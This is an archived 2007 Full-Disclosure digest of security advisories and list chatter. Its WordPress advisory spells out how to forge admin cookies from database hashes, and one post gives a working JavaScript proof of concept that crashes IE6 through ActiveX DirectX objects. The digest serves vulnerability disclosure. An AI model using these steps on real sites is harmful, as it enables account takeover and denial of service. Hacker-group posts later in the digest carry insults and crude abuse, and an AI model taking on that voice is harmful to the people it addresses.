Full Disclosure mailing list archives
unsubscribe
From: "LT" <lt () mac hush com>
Date: Mon, 26 Nov 2007 18:54:01 +0100
On Tue, 20 Nov 2007 08:54:18 +0100 full-disclosure-request () lists grok org uk wrote:

Send Full-Disclosure mailing list submissions to
    full-disclosure () lists grok org uk

To subscribe or unsubscribe via the World Wide Web, visit
    https://lists.grok.org.uk/mailman/listinfo/full-disclosure
or, via email, send a message with subject or body 'help' to
    full-disclosure-request () lists grok org uk

You can reach the person managing the list at
    full-disclosure-owner () lists grok org uk

When replying, please edit your Subject line so it is more specific
than "Re: Contents of Full-Disclosure digest..."

Note to digest recipients - when replying to digest posts, please trim your post appropriately. Thank you.

Today's Topics:

   1. [ MDKSA-2007:225 ] - Updated net-snmp packages fix remote denial of service vulnerability (security () mandriva com)
   2. Wordpress Cookie Authentication Vulnerability (Steven J. Murdoch)
   3. [ GLSA 200711-28 ] Perl: Buffer overflow (Pierre-Yves Rofes)
   4. [ MDKSA-2007:226 ] - Updated kernel packages fix multiple vulnerabilities and bugs (security () mandriva com)
   5. H2HC Materials (Rodrigo Rubira Branco (BSDaemon))
   6. rPSA-2007-0242-1 php5 php5-cgi php5-mysql php5-pear php5-pgsql php5-soap php5-xsl (rPath Update Announcements)
   7. Multiple stack-based buffer overflows in dxmsft.dll (Elazar Broad)
   8. [ MDKSA-2007:227 ] - Updated poppler packages fix vulnerabilities (security () mandriva com)
   9. [ MDKSA-2007:228 ] - Updated cups packages fix vulnerabilities (security () mandriva com)
  10. Tha Manual. (rchrafe)
  11. The Call to Reason (rchrafe)
  12. Re: How to become a Computer Security Professional ? (rchrafe)
  13. Re: How to become a Computer Security Professional ? (rchrafe)
  14. Re: How to become a Computer Security Professional ? (rchrafe)
  15. Large Scale MySpace Phishing Attack (Dancho Danchev)
  16. Re: Multiple stack-based buffer overflows in dxmsft.dll (Elazar Broad)
  17. Re: so gay huh? (rchrafe)
  18. Re: so gay huh? (rchrafe)

----------------------------------------------------------------------

Message: 1
Date: Mon, 19 Nov 2007 11:12:22 -0700
From: security () mandriva com
Subject: [Full-disclosure] [ MDKSA-2007:225 ] - Updated net-snmp packages fix remote denial of service vulnerability
To: full-disclosure () lists grok org uk
Message-ID: <E1IuB6c-0001Xp-Fv () artemis annvix ca>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDKSA-2007:225
http://www.mandriva.com/security/
_______________________________________________________________________

Package : net-snmp
Date    : November 19, 2007
Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0,
          Multi Network Firewall 2.0
_______________________________________________________________________

Problem Description:

The SNMP agent in net-snmp 5.4.1 and earlier allows remote attackers
to cause a denial of service (CPU and memory consumption) via a GETBULK
request with a large max-repeaters value.

Updated packages fix this issue.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5846
_______________________________________________________________________

Updated Packages:
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQFHQaYcmqjQ0CJFipgRAtwPAKDBmKLrILjPOlBxv0HLu3YwQxbjFACfVRZM
+tyjwf62Xh9rba65JnJ1RtU=
=zmEd
-----END PGP SIGNATURE-----

------------------------------

Message: 2
Date: Mon, 19 Nov 2007 18:46:37 +0000
From: "Steven J. Murdoch" <fulldisc+Steven.Murdoch () cl cam ac uk>
Subject: [Full-disclosure] Wordpress Cookie Authentication Vulnerability
To: full-disclosure () lists grok org uk
Message-ID: <20071119184637.GJ1043 () tern cl cam ac uk>
Content-Type: text/plain; charset="us-ascii"

Wordpress Cookie Authentication Vulnerability

Original release date: 2007-11-19
Last revised: 2007-11-19
Latest version: http://www.cl.cam.ac.uk/users/sjm217/advisories/wordpress-cookie-auth.txt
CVE ID: <pending>
Source: Steven J. Murdoch <http://www.cl.cam.ac.uk/users/sjm217/>

Systems Affected:

 Wordpress 1.5 -- 2.3.1 (including current version, as of 2007-11-19)

Overview:

 With read-only access to the Wordpress database, it is possible to
 generate a valid login cookie for any account, without resorting to
 a brute force attack. This allows a limited SQL injection
 vulnerability to be escalated into administrator access.

 This vulnerability is known to be actively exploited, hence the
 expedited public release.

I. Description

 For authentication, the Wordpress user database stores the MD5 hash
 of login passwords. A client is permitted access if they can present
 a password whose hash matches the stored one.

 $ mysql -u wordpress -p wordpress
 Enter password: ********
 mysql> SELECT ID, user_login, user_pass FROM wp_users;
 +----+-------------+----------------------------------+
 | ID | user_login  | user_pass                        |
 +----+-------------+----------------------------------+
 |  1 | admin       | 4cee2c84f6de6d89a4db4f2894d14e38 |
 ...

 Of course, entering your password after each action that requires
 authorization would be exceptionally tedious. So, after logging in,
 Wordpress presents the client with two cookies:

 wordpressuser_6092254072ca971c70b3ff302411aa5f=admin
 wordpresspass_6092254072ca971c70b3ff302411aa5f=813cadd8658c4776afbe5de8f304a684

 The cookie names contain the MD5 hash (6092...1a5f) of the blog URL.
 The value of wordpressuser_... is the login name, and the value of
 wordpresspass is the double-MD5 hash of the user password.

 Wordpress will permit access to a given user account if the
 wordpressuserpass_... cookie matches the hash of the specified
 user's wp_users.user_pass database entry. In other words, the
 database contains MD5(password) and the cookie contains
 MD5(MD5(password)). It is thus trivial to convert a database entry
 into an authentication cookie.

 At this point the vulnerability should be clear. If an attacker can
 gain read access to the wp_user table, for example due to a publicly
 visible backup or SQL injection vulnerability, a valid cookie can be
 generated for any account.

 This applies even if the user's password is sufficiently complex to
 resist brute force and rainbow table attacks. While it should be
 computationally infeasible to go backwards from MD5(password) to
 password, the attacker needs only to go forwards.

 The exploitation steps are therefore:

 1) Find the hash of the blog URL: Either just look at the URL, or
    create an account to get a user cookie
 2) Read the user_pass entry from wp_users table: Look for backups,
    perform SQL injection, etc...
 3) Set the following cookies:
     wordpressuser_<MD5(url)>=admin
     wordpresspass_<MD5(url)>=MD5(user_pass)
 4) You have admin access to the blog

II. Impact

 A remote attacker, with read access to the password database can
 gain administrator rights. This may be used in conjunction with an
 SQL injection attack, or after locating a database backup.

 An attacker who has alternatively compromised the database of one
 Wordpress blog can also gain access to any other whose users have
 the same password on both.

III. Solution

 No vendor patch is available.
 No timeline for a vendor patch has been announced.

 Workarounds:

 - Protect the Wordpress database, and do not allow backups to be
   released.
 - Keep your Wordpress installation up to date. This should reduce
   the risk that your database will be compromised.
 - Do not share passwords across different sites.
 - If you suspect a database to be compromised, change all passwords
   to different ones. It is not adequate to change the passwords to
   the same ones, since Wordpress does not "salt" [1] the password
   database.
 - Remove write permissions on the Wordpress files for the system
   account that the webserver runs as. This will disable the theme
   editor, but make it more difficult to escalate Wordpress
   administrator access into the capability to execute arbitrary code
 - Configure the webserver to not execute files in any directory
   writable by the webserver system account (e.g. the upload
   directory).

 Potential fixes:

 The problem occurs because it is easy to go from the password hash
 in the database to a cookie (i.e. the application of MD5 is the wrong
 way around). The simplest fix is to store MD5(MD5(password)) in the
 database, and make the cookie MD5(password). This still makes it
 infeasible to retrieve the password from a cookie, but means that it
 is also infeasible to generate a valid cookie from the database
 entry.

 However, there are other vulnerabilities in the Wordpress cookie and
 password handling, which should be resolved too:

 - Passwords are unsalted [2], leaving them open to brute force,
   rainbow table and other attacks [3].
 - It is impossible to revoke a cookie without changing the user's
   password.
 - Cookies do not contain an expiry time, so are always valid (until
   the user's password changes)
 - There ought to be an option to limit cookies to a particular IP
   address or range.

References:

 [1] http://en.wikipedia.org/wiki/Salt_(cryptography)
 [2] http://trac.wordpress.org/ticket/2394
 [3] http://www.lightbluetouchpaper.org/2007/11/16/google-as-a-password-cracker/

Timeline:

 2007-10-29: security () wordpress org notified; no response
 2007-11-02: security () wordpress org notified;
             Confirmation of active exploitation requested by Wordpress
 2007-11-02: Confirmation sent; no response
 2007-11-19: Advisory released to full-disclosure and BugTraq

--
w: http://www.cl.cam.ac.uk/users/sjm217/
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071119/f87361fa/attachment-0001.bin

------------------------------

Message: 3
Date: Mon, 19 Nov 2007 22:10:42 +0100
From: Pierre-Yves Rofes <py () gentoo org>
Subject: [Full-disclosure] [ GLSA 200711-28 ] Perl: Buffer overflow
To: gentoo-announce () gentoo org
Cc: full-disclosure () lists grok org uk, bugtraq () securityfocus com, security-alerts () linuxsecurity com
Message-ID: <4741FBD2.5040609 () gentoo org>
Content-Type: text/plain; charset=ISO-8859-1

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200711-28
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Perl: Buffer overflow
      Date: November 19, 2007
      Bugs: #198196
        ID: 200711-28

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A buffer overflow in the Regular Expression engine in Perl possibly
allows for the execution of arbitrary code.

Background
==========

Perl is a stable, cross-platform programming language created by Larry
Wall.

Affected packages
=================

    -------------------------------------------------------------------
     Package        /  Vulnerable  /                        Unaffected
    -------------------------------------------------------------------
  1  dev-lang/perl      < 5.8.8-r4                          >= 5.8.8-r4

Description
===========

Tavis Ormandy and Will Drewry (Google Security Team) discovered a
heap-based buffer overflow in the Regular Expression engine (regcomp.c)
that occurs when switching from byte to Unicode (UTF-8) characters in a
regular expression.

Impact
======

A remote attacker could either entice a user to compile a specially
crafted regular expression or actively compile it in case the script
accepts remote input of regular expressions, possibly leading to the
execution of arbitrary code with the privileges of the user running
Perl.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Perl users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-lang/perl-5.8.8-r4"

References
==========

  [ 1 ] CVE-2007-5116
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5116

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200711-28.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security () gentoo org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHQfvSuhJ+ozIKI5gRAvsEAJ4xdMYdYOWV1neFOchsoCtz3sUtGwCggFQg
RVShInUYsQgHfjeb1K1xnE4=
=wi9y
-----END PGP SIGNATURE-----

------------------------------

Message: 4
Date: Mon, 19 Nov 2007 16:41:14 -0700
From: security () mandriva com
Subject: [Full-disclosure] [ MDKSA-2007:226 ] - Updated kernel packages fix multiple vulnerabilities and bugs
To: full-disclosure () lists grok org uk
Message-ID: <E1IuGEs-0007rF-PH () artemis annvix ca>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________

Mandriva Linux Security Advisory                         MDKSA-2007:226
http://www.mandriva.com/security/
_______________________________________________________________________

Package : kernel
Date    : November 19, 2007
Affected: 2008.0
_______________________________________________________________________

Problem Description:

Some vulnerabilities were discovered and corrected in the Linux
2.6 kernel:

The minix filesystem code allows local users to cause a denial of
service (hang) via a malformed minix file stream (CVE-2006-6058).

An integer underflow in the Linux kernel prior to 2.6.23 allows remote
attackers to cause a denial of service (crash) via a crafted SKB length
value in a runt IEEE 802.11 frame when the IEEE80211_STYPE_QOS_DATA
flag is set (CVE-2007-4997).

To update your kernel, please follow the directions located at:

  http://www.mandriva.com/en/security/kernelupdate
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6058
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4997
_______________________________________________________________________

Updated Packages:
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQFHQfTKmqjQ0CJFipgRAm4KAJ9vlEIIafxXuBzFtS4lpZ7H98u+OACfeqnj
6pOfo1qywkIBnd5cQnlOdtM=
=qX1m
-----END PGP SIGNATURE-----

------------------------------

Message: 5
Date: Mon, 19 Nov 2007 21:14:15 -0000
From: "Rodrigo Rubira Branco (BSDaemon)" <rodrigo () kernelhacking com>
Subject: [Full-disclosure] H2HC Materials
To: full-disclosure () lists grok org uk
Message-ID: <20071119231415.E4DED8BEEB () mail fjaunet com br>
Content-Type: text/plain; charset="iso-8859-1";

For those interested in knowing more about the H2HC conference, the
presentation materials are now online at
http://www.h2hc.org.br/repositorio.php

cya,

Rodrigo (BSDaemon).

--
http://www.kernelhacking.com/rodrigo

Kernel Hacking: If i really know, i can hack

GPG KeyID: 1FCEDEA1

________________________________________________
Message sent using UebiMiau 2.7.2

------------------------------

Message: 6
Date: Mon, 19 Nov 2007 15:06:46 -0500
From: rPath Update Announcements <announce-noreply () rpath com>
Subject: [Full-disclosure] rPSA-2007-0242-1 php5 php5-cgi php5-mysql php5-pear php5-pgsql php5-soap php5-xsl
To: security-announce () lists rpath com, update-announce () lists rpath com, product-announce () lists rpath com
Cc: lwn () lwn net, full-disclosure () lists grok org uk, vulnwatch () vulnwatch org, bugtraq () securityfocus com
Message-ID: <4741ecd6.po1y971Bh5Pxcrhi%announce-noreply () rpath com>
Content-Type: text/plain; charset=us-ascii

rPath Security Advisory: 2007-0242-1
Published: 2007-11-19
Products:
    rPath Appliance Platform Linux Service 1
    rPath Linux 1

Rating: Minor
Exposure Level Classification:
    Remote Deterministic Denial of Service
Updated Versions:
    php5=conary.rpath.com@rpl:1/5.2.5-1-1
    php5-cgi=conary.rpath.com@rpl:1/5.2.5-1-1
    php5-mysql=conary.rpath.com@rpl:1/5.2.5-1-1
    php5-pear=conary.rpath.com@rpl:1/5.2.5-1-1
    php5-pgsql=conary.rpath.com@rpl:1/5.2.5-1-1
    php5-soap=conary.rpath.com@rpl:1/5.2.5-1-1
    php5-xsl=conary.rpath.com@rpl:1/5.2.5-1-1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-1943

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4887
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4783
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4840
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5898
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5899
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5900

Description:
    Previous versions of the php5 package contain multiple
    vulnerabilities, the most serious of which involve several Denial of
    Service attacks (application crashes and temporary application
    hangs). It is not currently known that these vulnerabilities can be
    exploited to execute malicious code.

    In its default configuration, rPath Linux 1 does not install php5
    and is thus not vulnerable; however, systems upon which php5 and an
    exposed application have been installed may be vulnerable.

http://wiki.rpath.com/Advisories:rPSA-2007-0242

Copyright 2007 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html

------------------------------

Message: 7
Date: Mon, 19 Nov 2007 17:30:32 -0500 (GMT-05:00)
From: Elazar Broad <elazarb () earthlink net>
Subject: [Full-disclosure] Multiple stack-based buffer overflows in dxmsft.dll
To: "full-disclosure () lists grok org uk" <full-disclosure () lists grok org uk>
Message-ID: <30247048.1195511432439.JavaMail.root@elwamui-norfolk.atl.sa.earthlink.net>
Content-Type: text/plain; charset=UTF-8

There are multiple stack overflows in dxmsft.dll version 6.3.2900.3199 (Image DirectX Transforms). This DLL exposes DirectX Image Transform objects which are safe for scripting. The issue is with the Color property of certain objects, so I am assuming this property is inherited from a base interface. This affects Windows XP SP2 IE6 (fully patched), I have not tested this on IE7 and it does not appear to affect Windows Server 2003 R2 SP2 (newer version of the dxmsft.dll). I have not tested code execution, though it may be possible. I received the following response from Microsoft:

---
From our investigation this issue was found to be a stability problem which is not exploitable. The net effect of this issue is that IE will become unresponsive. The underlying operating system will still respond and killing the process will stop the local DoS.
---

It did not hang IE on my machine, but instead crashed IE with a stack overflow. This may be related to http://www.securityfocus.com/bid/19029/.

PoC as follows:

---------------------
<!--
written by e.b.
-->
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
  var s = "AAAA";
  while (s.length < 999999) s=s+s;

  var obj = new ActiveXObject("DXImageTransform.Microsoft.Chroma");
  obj.color = s;

  var obj = new ActiveXObject("DXImageTransform.Microsoft.DropShadow");
  obj.color = s;

  var obj = new ActiveXObject("DXImageTransform.Microsoft.Glow");
  obj.color = s;

  var obj = new ActiveXObject("DXImageTransform.Microsoft.MaskFilter");
  obj.color = s;

  var obj = new ActiveXObject("DXImageTransform.Microsoft.Shadow");
  obj.color = s;
}
</script>
</head>
<body onload="JavaScript: return Check();" />
</html>
---------------------

Elazar

------------------------------

Message: 8
Date: Mon, 19 Nov 2007 19:12:41 -0700
From: security () mandriva com
Subject: [Full-disclosure] [ MDKSA-2007:227 ] - Updated poppler packages fix vulnerabilities
To: full-disclosure () lists grok org uk
Message-ID: <E1IuIbR-0008H5-79 () artemis annvix ca>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________

 Mandriva Linux Security Advisory                         MDKSA-2007:227
 http://www.mandriva.com/security/
_______________________________________________________________________

 Package : poppler
 Date    : November 19, 2007
 Affected: 2007.1, 2008.0, Corporate 4.0
_______________________________________________________________________

 Problem Description:

 Alin Rad Pop found several flaws in how PDF files are handled in poppler. An attacker could create a malicious PDF file that would cause poppler to crash or potentially execute arbitrary code when opened.

 The updated packages have been patched to correct this issue.
_______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4352
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5392
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5393
_______________________________________________________________________

 Updated Packages:
_______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
_______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQFHQhenmqjQ0CJFipgRAl9SAJ9gU0uhZwFvHZ9tF4z8F15VUgUfNwCgjOhN
XrZ88C4TwK/FkZL+zC+zOLU=
=ehqr
-----END PGP SIGNATURE-----

------------------------------

Message: 9
Date: Mon, 19 Nov 2007 19:23:22 -0700
From: security () mandriva com
Subject: [Full-disclosure] [ MDKSA-2007:228 ] - Updated cups packages fix vulnerabilities
To: full-disclosure () lists grok org uk
Message-ID: <E1IuIlm-0008OR-55 () artemis annvix ca>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________

 Mandriva Linux Security Advisory                         MDKSA-2007:228
 http://www.mandriva.com/security/
_______________________________________________________________________

 Package : cups
 Date    : November 19, 2007
 Affected: 2007.0, 2007.1, 2008.0, Corporate 3.0, Corporate 4.0
_______________________________________________________________________

 Problem Description:

 Alin Rad Pop found several flaws in how PDF files are handled in cups. An attacker could create a malicious PDF file that would cause cups to crash or potentially execute arbitrary code when opened.

 The updated packages have been patched to correct this issue.
_______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4352
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5392
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5393
_______________________________________________________________________

 Updated Packages:
_______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
_______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQFHQhlDmqjQ0CJFipgRAs6VAJ0Z1CEZIWu9sWiiexjGtC+JUXXXMACgo44W
z5jyh/u/+4QFVsSocymKj/g=
=RkrY
-----END PGP SIGNATURE-----

------------------------------

Message: 10
Date: Tue, 20 Nov 2007 07:09:46 +0100
From: rchrafe <rchrafe () gmail com>
Subject: [Full-disclosure] Tha Manual.
To: full-disclosure () lists grok org uk
Message-ID: <47427A2A.5060905 () gmail com>
Content-Type: text/plain; charset=windows-1252; format=flowed

Tha manual.

We do not care about you, or your affiliates. We are in position, and a new army has emerged.

The first of a set of manuals, being provided as follows shall be provided wherein those who maintain an interest in the power of the simplicity of man.

The Manual
Written by d4rk1v4n, part of the rchrafe crime wave.

Notes: We are the rchrafe, you are pathetic

You must learn assembly. It must be the breakpoint for any other language, high-level or low-level and integral learning processes. It will be assumed that a thorough course in C Programming and Assembly must first commence. Also after which a basic, yet thorough understanding of Logic Gates, which will be provided as articles following the manual.

This guide is a perfected manual, crisp with only the intent to create an army of elite. Simply to intervene.
Mod 1: Kernel Design
{
Operating System Concepts Chapters 1-3 5-13 Linux Kernel 2.4 Chapters 1-13 Shellcode Stack Overflows Format string exploitation Integer Overflows Race Conditions (files) Kernel Exploitation (Linux) Kernel patching (Linux) Kernel rootkit (Linux) linux process patching dlmalloc exploitation (partial analysis of 6 thousand line src) raw sockets, hping2 i/o multiplexing pthreads ELF executable format OS Fingerprinting IRC Protocol RFC SMTP Protocol ICMP Protocol POP3 protocol
}

Mod 2: Algorithms & Data Structures
{
Computer Organization Hardware/Software Int. chapters 1-6 FreeBSD Design And Implementation chapters 1-6, 8, 12, 13 Algorithms And Data structures (Sedgwick, knuth, whale) Linux TCPIP Implementation Linux Synchronization analysis Linux ext3 analysis Linux kmalloc analysis Threads Mandatory Access Control Models (Selinux,grsec,trustedbsd, dod85) Role Based Access Control (rsbac for linux) Buffer overflow Protection MIPS ASM Computer Networks - Tanenbaum C++ (full) Perl phkmalloc exploitation advanced dlmalloc exploitation advanced fmt string exploitation advanced race conditions (double free, etc) freebsd kernel exploitation freebsd kernel rootkit cisco protocols (IGRP, EIGRP, BGP, OSPF, IS-IS) TCP RFC IP RFC IPSEC RFC DNS specification HTTP specification IMAP specification SSL 3 specification Kerberos asynch i/o perl exploitation php exploitation sql injection win32 API PE executable format windows ring 3 hacks IDA/Softice work binary encryption polymorphic shellcode WIN DCOM ONE RPC Specification
}

Mod 3: Large source analysis
{
400-500 Thousand lines of src analysis Solaris Kernel internals book Sparc ASM windows kernel analysis & exploitation Prolog Artificial Intelligence Compilers SIMD ISP Design Database Design ISBN: 0321204484 Sysvmalloc exploitation IOS malloc exploitation RTL malloc exploitation kmalloc exploitation ATM VPN's DecNet Cryptography Linear algebra
}

Level 4: Parallelism, Distributiveness, Diversity
{
OpenVMS Scheduler ISBN: 1555581560 OpenVMS Memory Managment ISBN: 1555581595 Real Time Scheduling Design ISBN: 0387231374 HP-UX Kernel internals ISBN: 0130328618 Distributed Operating Systems ISBN: 0132199084 VHDL ISBN: 0471899720 Verilog Designing a MAC Model (like selinux) Designing BOF Protection (like PAX) Parallel Architectures Parallel Algorithm Design Advanced Artificial Intelligence Alpha PowerPC PA-RISC ARM M68K OpenVMS using HP-UX using Digital Image Processing Digital Signal Processing Electrical Engineering Basics Circuit Board Design
}

The rchrafe will resume tutorials of the Mod 1 on the 1st of December 2007, in the channel #crx under irc.efnet.org/pl/ru

We will not accommodate stupidity.

The key will be revealed on rchrafe.wordpress.com at midnight, the 1st of december 2007 for all to join!

Well will rise!

------------------------------

Message: 11
Date: Tue, 20 Nov 2007 07:13:02 +0100
From: rchrafe <rchrafe () gmail com>
Subject: [Full-disclosure] The Call to Reason
To: full-disclosure () lists grok org uk
Message-ID: <47427AEE.2060404 () gmail com>
Content-Type: text/plain; charset=windows-1252; format=flowed

"The Call to Reason."
By the rhcrafe Senior seat of officials.

BEHOLD AND WITNESS, those who read this document, this which is the official PROCLAMATION and LETTER OF INTENT concerning the future of RCHRAFE and RCHRAFE member states; the words within are no less than the movement of RCHRAFE from its widely admired position in the computer underground to an overt existence as a world renowned hacking into computer machines authority.

REGARDING the current social state of hacking into computer machines, RCHRAFE takes no stance. As an autonomous body with goals unrelated to what is largely considered "the hacking community", RCHRAFE recognizes no entities nor social classes other than RCHRAFE and anti-RCHRAFE. Abstract concepts such as "black hat" and "white hat" do thus not exist in the lexicon of RCHRAFE politics, and are irrelevant to our goals. What then, are the goals and motivations of this powerful force that has developed over the years, that has come to be known as RCHRAFE? No less than the subjugation of power in the computer machine community. It is at this time appropriate to state COMMUNIQUE POINT NUMBER ONE:

"RCHRAFE DOES NOT AFFILIATE IN CONCEPT WITH ANY EXISTING POLITICAL OR SOCIAL ENTITIES. RCHRAFE IS IN AND OF ITSELF, A SOCIAL PHENOMENON OF ADEQUATE STATURE TO STAND WITHOUT ASSISTANCE OR AFFILIATION."

It should be pointed out that although RCHRAFE has strong ties to the American Republican Party and political republican ideology, we do not participate actively in government politics of any kind.
PERTAINING TO the overall goals of RCHRAFE as an organization and the pervasive RCHRAFE social movement, we have distinct purpose and bearing. While RCHRAFE assimilates no political or social goals in and of themselves, we reserve the right to voice opinion when political or social policies or activities relate to these aforementioned goals. These goals, stated, comprise COMMUNIQUE POINT NUMBER TWO:

"RCHRAFE EXISTS ENTIRELY FOR THE ADVANCEMENT OF MEMBERS, MEMBER INTEREST, AND HAQING INTO COMPUTER MACHINES."

We may surmise in corollary then, by the combined observations of communique points one and two, that RCHRAFE is in definition a usurping entity, and will tend to remain benign concerning rival computer groups.

TO CONCLUDE, RCHRAFE will exist as long as the interests of the corollaries are subject to external change. We reserve the right to maintain the status of RCHRAFE and the goals of the corollaries by any mean necessary, but never by exceeding necessary means.

We Shall Rise!

------------------------------

Message: 12
Date: Tue, 20 Nov 2007 07:33:09 +0100
From: rchrafe <rchrafe () gmail com>
Subject: Re: [Full-disclosure] How to become a Computer Security Professional ?
To: worried security <worriedsecurity () googlemail com>
Cc: full-disclosure () lists grok org uk
Message-ID: <47427FA5.2090307 () gmail com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed

worried security wrote:

On Nov 17, 2007 1:08 PM, Meef <massa () iut-dhaka edu> wrote:

What are the steps to follow to become a computer security professional ?,

Sorry, you will never make it to professionalism as you broke the first and most important rule. NEVER POST ON A PUBLIC MAILING LIST!!!!

And you are here because, you are 'worried security'.

The second most important rule of becoming a security professional is, if you do need to post to a public mailing list then never do it under a .edu or .gov or official company e-mail address, we will all just point and laugh and have your account hi-jacked with the next cross-site scripting flaw that gets to the public mailing list.

But I thought the first most important rule, which was not to be broken, was not to post on a security mailing list, such as this. Kindly go through your cross-site request forgery techniques with me, I'm really in need of a m3nt0r

The third most important rule to becoming a security professional is never talk to people on public mailing lists who have broken rule one and rule two or take whats said on public mailing lists seriously. As soon as you take what is said on a public mailing list seriously is the day you should cut your wrists.

He's getting so horny right now

Always get advice from a credible source after learning of a threat on the public mailing lists.

Like worried security? Please tell me if you think the linux/tcp stack is currently vulnerable. I have N0 1D34

The fourth most important rule to becoming a security professional, always use a throw-away e-mail account so it doesn't matter of script kids hi-jack your e-mail account with the next cross-site scripting vulnerability that gets posted to the public mailing lists.

HIJACK THIS BITCH

The fifth most important rule to becoming a security professional is use an alias on public mailing lists, never use your real name, place of work, place of education, place of living, as backfires cannot be reversed. Once you've post something its post, archived around the world and translated into more languages than you can shake a stick at.

Y0u juzt m1ght be shirl0ck h0lm3z

